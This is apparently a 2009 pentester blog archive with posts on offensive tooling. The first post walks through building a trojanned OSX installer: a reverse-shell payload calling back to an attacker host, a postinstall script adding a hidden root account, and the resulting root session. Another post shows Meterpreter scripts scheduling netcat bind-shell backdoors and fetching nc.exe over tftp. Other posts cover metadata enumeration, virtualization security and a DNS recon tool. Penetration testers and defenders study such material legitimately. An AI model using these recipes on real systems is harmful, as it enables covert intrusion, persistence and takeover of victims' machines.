Navigation

Entries from April 1, 2009 - April 30, 2009

Saturday
Apr252009

Evil Packaging on OSX with Xcode and Metasploit

Mubix did a very good video on packaging a Meterpreter payload with iexpress in windows to create a trojanned installer for windows at room 362 I decided to give it a spin and make one for OSX, this kind of attack is perfect for many environments since there is no patch for stupidity. Packaging an evil installer gives many vector for performing attacks like placing it on Removable Media and seeing who picks it up, Social Engineering to name a few.

OSX has a packager named Package Maker that is included with OSX with their DVD their Development environment Xcode or it can be downloaded from http://connect.apple.com I highly recommend that the version used is the one downloaded from the webpage since this will be   the latest version for your Mac. Once the DMG file is downloaded and installed the tools will be located in the root of your hard drive under Development.

But before we create package we must create our payload for this example I will use a Metasploit Reverse TCP Shell for OSX and a script to create an account with UID 0 for later attack against the target machine. To generate our payload with the latest Metasploit development version we run the following command:

root@bt:/pentest/exploits/framework3# ./msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.1.103 X > osxexe
Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
 Length: 65
Options: LHOST=192.168.1.103

Now we have a OSX x86 Executable Payload set to connect back to attackers machine 192.168.1.103 on the default port of 4444. We will also create a post installation script to launch our payload and create an account with UID 0 this will give us Root privileges and will not show on the login screen since it is under UID 500. The script will look looks like this:

#!/bin/sh
#run Backdoor
/usr/bin/osxexe &
#create user account with admin privs
dscl . -create /Users/dark
dscl . -create /Users/dark UserShell /bin/bash
dscl . -create /Users/toddharris RealName "Darkoperator"
dscl . -create /Users/toddharris UniqueID 0
dscl . -create /Users/toddharris PrimaryGroupID 0
dscl . -passwd /Users/dark P@55w0rd
#

This script will launch the payload when it is installed on /usr/bin path on the target machine and it will create an account with username dark and password P@55w0rd . We now start the Package Maker which is located in the root of the System HD under Developmer/applications/utilities and we double click Package Maker. We should be greeted with a screen as follows:

Picture 1

We enter the organization name we want to appear in the properties of the file and the minimum target OS we want this package to run under.

Picture 2

Then we give the package a title and we select that the installation be on the System Volume and give it a description if we want.

Picture 3

We then on the bottom left side of the we click on the plus sing and select our payload if we wish we can also add a OSX app for cover, we set the Destination path for the payload and we make sure the Require Admin Authentication checkbox is selected since we want our script and payload to be executed as root.

Picture 4

On the content tab we select the payload and we set the proper permissions for the payload making the Owner root, Group admin and making sure that the file has the execute permission for the owner and others set.

Picture 5

In the scripts tab we select the Script Directory where we placed our post install script and we select it in postinstall the script.

Picture 6

Now we click on the top left the Build button to build our pkg file. We place the file in a DMG on a share, on a USB stick or any other place from where our target will execute the installer thinking it is a valid package.

We prepare our attacking machine to receive the shells that will be coming from the execution of the trojanned packaged in Metasploit and then we wait for the connections:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD osx/x86/shell_reverse_tcp 
PAYLOAD => osx/x86/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.103 
LHOST => 192.168.1.103
msf exploit(handler) > set ExitOnSeesion false
ExitOnSeesion => false
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.103:4444 -> 192.168.1.120:58942)
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff)
pwd
/
uname -a
Darwin carlos-perezs-computer.local 9.6.0 Darwin Kernel Version 9.6.0: Mon Nov 24 17:37:00 PST 2008; root:xnu-1228.9.59~1/RELEASE_I386 i386

As you can see the shell is running under id 0. This attack can be expanded on further with the addition of scheduling the payload to run every minute, configure and start SSH or Remote Connection (VNC) and disable the built in Firewall and little snitch if present among many other.

Thursday
Apr232009

Metadata Enumeration with FOCA

One very important part of any pentest is the gathering of information of the target network that will be attack and on area that is gaining a lot of traction is the enumeration thru metadata.  A tool I recently learned about by listening to the great podcast Exotic Liability where they mentioned the FOCA tool by Informatica64 when talking about their presentation at Blackhat Europe 09 you can either download the FOCA tool or you can use the webpage to summit your document for analysis. I do prefer to do most of my analysis locally since on almost all pentests I have conducted all information is confidential and the sharing of information with third parties is not permitted . This tool will analyze metadata from Microsoft Office Documents, PDF files, Open Office Files and Word Perfect files, EXIF Metadata out of images and the best part is that you can add the files you collected manually or found and downloaded thru web searches using Google and Live Search witch makes it extremely flexible for pentests. it will enumerate Users, Folders, Printers, Emails and the version of Software used to create the file. This tool will run on Windows XP and Windows Vista, I found it to be really unstable in Windows 7 Beta.

After downloading run the setup executable and the tool will be available in the start menu under programs. Once you execute the application you should see a screen line this one:

image

You can press Project –> New Project and start a new project where you give the Project Name, the Website to enumerate for documents and a give it a place to download and store the documents.

image

You can also instead choose to add a single file or folder of files that you have gathered previously via email, social engineering or any other way by Righ-Clicking with the mouse on the  document list area and choose either the Add File or Add Folder option.

image

When you select to create a New Project you the screen will change in the following manner giving you the option of which files to download and what search engine to use.

image

But what if the file type you are looking for is not in the options like PNG or JPG? you can click on the Custom Search link and enter the Google query your self or add filetype:<extension> like it is shown in the image below.

image

For the following screenshots I will enumerate and download only doc files from Blackhat.com, so I hit search and you can see the files that where found, one it has finish you can righ click and download only specific files of choose to download them all.  Once Downloaded you can righ-click again on them and choose to extract the metadata of a single file or select to extract the metadata of all the files.

image

Once it has finished extracting all the metadata you can look at it by clicking on the type or go to Documents select the document and click on it to get even more information not classified in the types given like EXIF data. Here I clicked on the folder tab and you can see I can identify usernames, location, servers and paths on the network of where this documents where created and stored, on some I have tested I was even able to enumerate Sharepoint Server structures.

image

This information can be exported in to a text file by right-clicking on the attribute and choosing to export data to a file, this can later be used to feed the data in to other tools or to gain information for further attacks like finding types of printers that can be used to store files or exploit since embedded device security tends to be low, or attack shares by dropping office documents with Meterpreter VBA shells or setting autirun.ini files to launch payloads or exploits on client PC’s, The options are many.

I will definitely be adding this tool to my toolbox and making it part of my methodology when executing target enumeration during pentetst. I hope you find this information useful and special thanks to the Exotic Liability team for mentioning this tool.

Saturday
Apr112009

Abusing the Scheduler with Meterpreter

Recently I had a chance to look at Val Smith and Collin Ames presentation that was presented in Defcon 16 called Meta-Post Exploitation. In the presentation they talk about many post-exploitations techniques I already knew as well as some new approaches to others. 3 specific tools that where demoed that caught my attention where MassWinenum and AtAbuse. I quickly modified my Remotewinenum script to support multiple targets, quite an easy task since most of the work was already done, the only difference is that I use WMIC to achieve this, I like to be as stealthy as possible an use the built in tools as much I can to my advantage. Here is a sample of the execution of the script:

meterpreter > run remotewinenum -t 192.168.1.7,192.168.1.8
[*] Running Enumeration against 192.168.1.7
[*] Saving report to /home/carlos/.msf3/logs/remotewinenum/192.168.1.7_20090410.0206
[*] Running WMIC Commands ....
[*] running command wimic environment list
[*] running command wimic share list
[*] running command wimic nicconfig list
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group list
[*] running command wimic sysaccount list
[*] running command wimic volume list brief
[*] running command wimic logicaldisk get description,filesystem,name,size
[*] running command wimic netlogin get name,lastlogon,badpasswordcount
[*] running command wimic netclient list brief
[*] running command wimic netuse get name,username,connectiontype,localname
[*] running command wimic share get name,path
[*] running command wimic nteventlog get path,filename,writeable
[*] running command wimic service list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic rdtoggle list
[*] running command wimic product get name,version
[*] running command wimic qfe list
[*] Running Enumeration against 192.168.1.8
[*] Saving report to /home/carlos/.msf3/logs/remotewinenum/192.168.1.8_20090410.0206
[*] Running WMIC Commands ....
[*] running command wimic environment list
[*] running command wimic share list
[*] running command wimic nicconfig list
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group list
[*] running command wimic sysaccount list
[*] running command wimic volume list brief
[*] running command wimic logicaldisk get description,filesystem,name,size
[*] running command wimic netlogin get name,lastlogon,badpasswordcount
[*] running command wimic netclient list brief
[*] running command wimic netuse get name,username,connectiontype,localname
[*] running command wimic share get name,path
[*] running command wimic nteventlog get path,filename,writeable
[*] running command wimic service list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic rdtoggle list
[*] running command wimic product get name,version
[*] running command wimic qfe list
meterpreter >

As it can be seen a comma separated target list can be provided now and the tool will execute either under the privileges under which Meterpreter is running or a username and password provided each report per host saved in a different file and location for later analysis.

The tool that draw most of my attention was the AtAbuser since it’s concept is extremely simple, for a long time I had been using the scheduler to schedule backdoors and for privilege escalation but Val Smith’s tools used it for remote command execution and since the privileges it runs under are as System this makes it a very powerful tool and as indicated the Scheduler service is one that is overlooked by many when hardening their servers. A set of tools came from this, the first one I call Scheduleme which it is for assisting in scheduling tasks on a local target or remote target.

meterpreter > run scheduleme 
Scheduleme Meterpreter Script
This script provides most common scheduling types used during a pentest.
It has the functionality to upload a desired executable or script and schedule
the file uploaded. All scheduled task are as System so Meterpreter process must
be System or local admin for local schedules and Administrator for remore shcedules
-h Help menu.
-c <opt> Command to execute at the given time. If options for execution needed use double quotes
-d Daily.
-hr <opt> Every specified hours 1-23.
-m <opt> Every specified amount of minutes 1-1439
-l When a user logs on.
-s At system startup.
-i Run command imediatly and only once.
-r Remote Schedule. Executable has to be already on remote target
-e <opt> Executable or script to upload to target host, will not work with remote schedule
-o <opt> Options for executable when upload method used
-u Username of account with administrative privelages.
-p Password for account provided.
-t <opt> Remote system to schedule job.
meterpreter >

It also has the capability of uploading an executable and scheduling it on the target under which the Meterpreter session is running under. The options for scheduling are:

  • Hourly
  • Minutes
  • At user logon
  • At system startup
  • Immediately

The script will run either as the privilege level under which Meterpreter is running or under the credentials provided, both for local and remote execution. I recently used this script in a pentest where I was able to gain access to a Windows 2008 server but do to the protection in Windows 2008 I could not dump the hashes even as Administrator so I scheduled a second Meterpreter payload to run immediately and since the schedules are done as system I was able to dump the hashes. The uploaded files are stored in the %TEMP% environment variable they receive a random name.

Setting a Netcat Backdoor first example will upload and set the backdoor, the second one is in the case the file already exists on the target machine:

meterpreter > run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
[*] Uploadingd /tmp/nc.exe....
[*] /tmp/nc.exe uploaded!
[*] Scheduling command C:\DOCUME~1\labuser\LOCALS~1\
Temp\svhost46.exe -e cmd.exe -L -p 8080 to run minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck93 /F

meterpreter > run scheduleme -m 1 -c "C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe -e cmd.exe -L -p 8088"
[*] Scheduling command C:DOCUME~1labuserLOCALS~1Tempsvhost46.exe -e cmd.exe -L -p 8088 to run minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck47 /F

The other script that acts a bit more like the AtAbuser script that Val Smith demoed in his talk is the Schtaskabuse, it uses as the name implies the schtasks command instead of AT, one of the main reasons is flexibility and such flexibility makes it a more complex command to use in a shell but perfect for being scripted. The script will run a series command in a comma separated list and execute each of the command by scheduling the task, running the task immediately, waiting a specified time frame and then deleting the task. Just like the other scripts it will use the privileges of the process under which Meterpreter is running or credential can be provided. All commands will be executed under the context of system on the target box making this a very powerful tool under the right circumstances. 

meterpreter > run schtasksabuse 
Meterpreter session running as ACMEINC\Administrator
This Meterpreter script is for running commands on targets system using the
Windows Scheduler, it is based on the tool presented but not released by Val Smith
in Defcon 16 ATAbuser. If no user and password is given it will use the permissions
of the process Meterpreter is running under.
Options:

OPTIONS:

-c <opt> Commands to execute. Several command can be given but separated by commas and enclose the list in doble quotes if arguments are used.
-d <opt> Delay between the execution of commands in seconds, default is 2 seconds if not given.
-h Help menu.
-p <opt> Password for user account specified, it must be given if a user is given.
-t <opt> Remote system to schedule job.
-u <opt> Username to schedule task, if none is given the current user credentials will be used.

An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.

meterpreter > run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
Meterpreter session running as ACMEINC\Administrator
[*] Scheduling command tftp -i 192.168.1.8 GET nc.exe to run .....
[*] The scheduled task has been successfully created
[*] Running command on 192.168.1.7
[*] Removing scheduled task
[*] Scheduling command nc -L -p 8080 -e cmd.exe to run .....
[*] The scheduled task has been successfully created
[*] Running command on 192.168.1.7
[*] Removing scheduled task
meterpreter >

This can be used to start services, upload payloads, fgdump or any other set of tools or command and execute them.

I hope that this tools are helpful and all feedback is welcomed. I will summit this tools to the Metasploit project for approval for commitment in to the current development branch

Thursday
Apr092009

Virtualization changes the rules

One of the areas that I have see that has been growing in most of the Datacenters I have had a chance to consult in is the Virtualization. Many companies and government agencies are looking at virtualization to reduce their operational costs and at the same time gain some of the advantages of virtualization, but an area that I have seen that the virtualization vendors and most system integrator is overlooking is how virtualization changes the way networks are designed and how it also changes the processes for the security team. The biggest mistake I have seen is the mixing of environments without doing a proper risk assessment and segmenting your averments appropriately, you can see this in:

  • Mixing VDI machines (High Risk users have control!!) with server machines (Here is most of the data you want secured).
  • Having DMZ server and Internal server on a same Hypervisor Cluster.
  • Having the Lab Environment and production environments mixed on a same group of clusters.

This are only some basic examples. There is currently development and research being done by the bad guys on how to do VM Escapes and gain access to the physical host, all major vendors have released patches for this and still you do not see questions for this in any of the major risk assessment companies and guides out there. Another area that it is grossly overlook is how do you design your network and storage infrastructure, where do you put your IDS/IPS boxes? how do you segment traffic? in fact one of the major buzz words in converged networks where you have FCoE, ISCSI and NFS running on the same network where you are moving Ethernet communication packets so if a box is compromised or a piece of network equipment is compromised and the attacker can sniff or perform a MITM attack he can see not only the network traffic but the storage traffic giving a greater amount of access to the data. Many designs are badly done where they not only do not segregate on witch physical set of server what VM’s will be hosted but they have LUNs in the SAN where they have the machines mixed, so if an attacker gains access to the physical server he can also have access to VM’s of different levels of classification. 

Another great area of change many times overlooked is procedures, and in an IT environment there are plenty:

  • Backup procedures.
  • Change Management and Patch Management.
  • Incident Response

and this are only but a few of the procedures that must be modified when moving in to a virtual environment. Management as a whole changes, the admin of the physical servers have the power to change and control the VM’s in that environment, permissions will vary to grant the necessary access to the right people to manage the resources and the management system become one of the biggest area of risk if not secure properly. There must be a separation of the management network just like we separate the network and storage traffic. Also the management host must be hardened and all necessary precautions must me taken like having IPS monitoring the traffic to this systems, having proper logging set up, having HIPS on this boxes and proper change management since a compromise of one of this boxes means that the attacker gained the keys to the kingdom.  This is just a rant on some of the main points that I see are not being addressed properly by the major virtualization vendors when they talk about virtualization and consolidation. The bad guys are doing their research and they even have attack code that will detect if the target is a VM we better catch up before it is to late.

Friday
Apr032009

DNS Recon Tool written in Ruby

I wrote this tool back in late 2006 and it has been my favorite tool for enumeration thru DNS, in great part because I wrote it and it gives the output in a way that I can manipulate it in my own style.  One of the features that I used the most and gave me excellent results is the SRV record enumeration. The script will perform the following:

  • Standard Record Enumeration for a given domain (A, NS, SOA and MX).
  • Top Leven Domain Expansion for a given domain.
  • Zone Transfer against all NS records of a given domain.
  • Reverse Lookup against a given IP Range given a start and end IP.
  • SRV Record enumeration, enumerating:
    • _gc._tcp.
    • _kerberos._tcp.
    • _kerberos._udp.
    • _ldap._tcp.
    • _test._tcp.
    • _sips._tcp.
    • _sip._udp.
    • _sip._tcp.
    • _aix._tcp.
    • _aix._tcp.
    • _finger._tcp.
    • _ftp._tcp.
    • _http._tcp.
    • _nntp._tcp.
    • _telnet._tcp.
    • _whois._tcp.
    • _h323cs._tcp.
    • _h323cs._udp.
    • _h323be._tcp.
    • _h323be._udp.
    • _h323ls._tcp.
    • _h323ls._udp.
  • Brute force hostnames and subdomains of a given target domain using a wordlist.

To install the necessary ruby dependencies using ruby gems, run the following commands as root:

gem install pNet-DNS
gem install ip

 

The script can be downloaded from dnsrecon.rb

I do hope that others find it as useful as I have, this tool will be included in BT4 among others of the tools that I have discussed in this blog.

Help Screen of the script:

root@bt:~# ./dnsrecon.rb

Dnsrecon 1.6
By Carlos Perez
Email: carlos_perez[at]darkoperator.com

This is a simple tool written for target enumeration during authorized penetration test
engagements. This tool provides different methods for enumerating targets thru DNS service.

-t, --type
                Select the type of enumeration to be done.
                std     Query for SOA, NS and MX Record of a target domain.
                tld     Top Level Domain enumeration of a target domain.
                axf     Perform a Zone transfer against all NS server Records
                        of a target domain.
                rvs     Reverse Record Lookup enumeration against a targeted
                        IP range.
                srv     Service Record Enumeration of VOIP, Active Directory and
                        Network Services service records.
                brt     Bruteforce subdomain and host records using a wordlist.

-d, --target
                Domain to be targeted for enumeration.

-i, --ip
                Starting IP and end IP for a range to be used for reverse lookup
                enumeration of a targeted domain. Exmpl. 192.168.1.1,192.168.1.253

-w, --wordlist
                Wordlist to be use for brutforce enumeration of host names and subdomains.

-s, --dns
                Alternate DNS server to use.
-h, --help
                This help message.

 

Here is an Example of the tool enumerating SRV Record and Standard Record.

root@bt:~# ./dnsrecon.rb -t srv -d avaya.com
_sip._udp.avaya.com,198.152.17.90,5060
_sip._tcp.avaya.com,198.152.17.90,5060

root@bt:~# ./dnsrecon.rb -t std -d google.com
google.com,209.85.171.100,A
google.com,74.125.67.100,A
google.com,74.125.45.100,A
ns1.google.com,216.239.32.10,SOA
ns4.google.com,216.239.38.10,NS
ns1.google.com,216.239.32.10,NS
ns2.google.com,216.239.34.10,NS
ns3.google.com,216.239.36.10,NS
smtp4.google.com,72.14.221.25,MX,10
smtp1.google.com,209.85.237.25,MX,10
smtp2.google.com,64.233.165.25,MX,10
smtp3.google.com,209.85.137.25,MX,10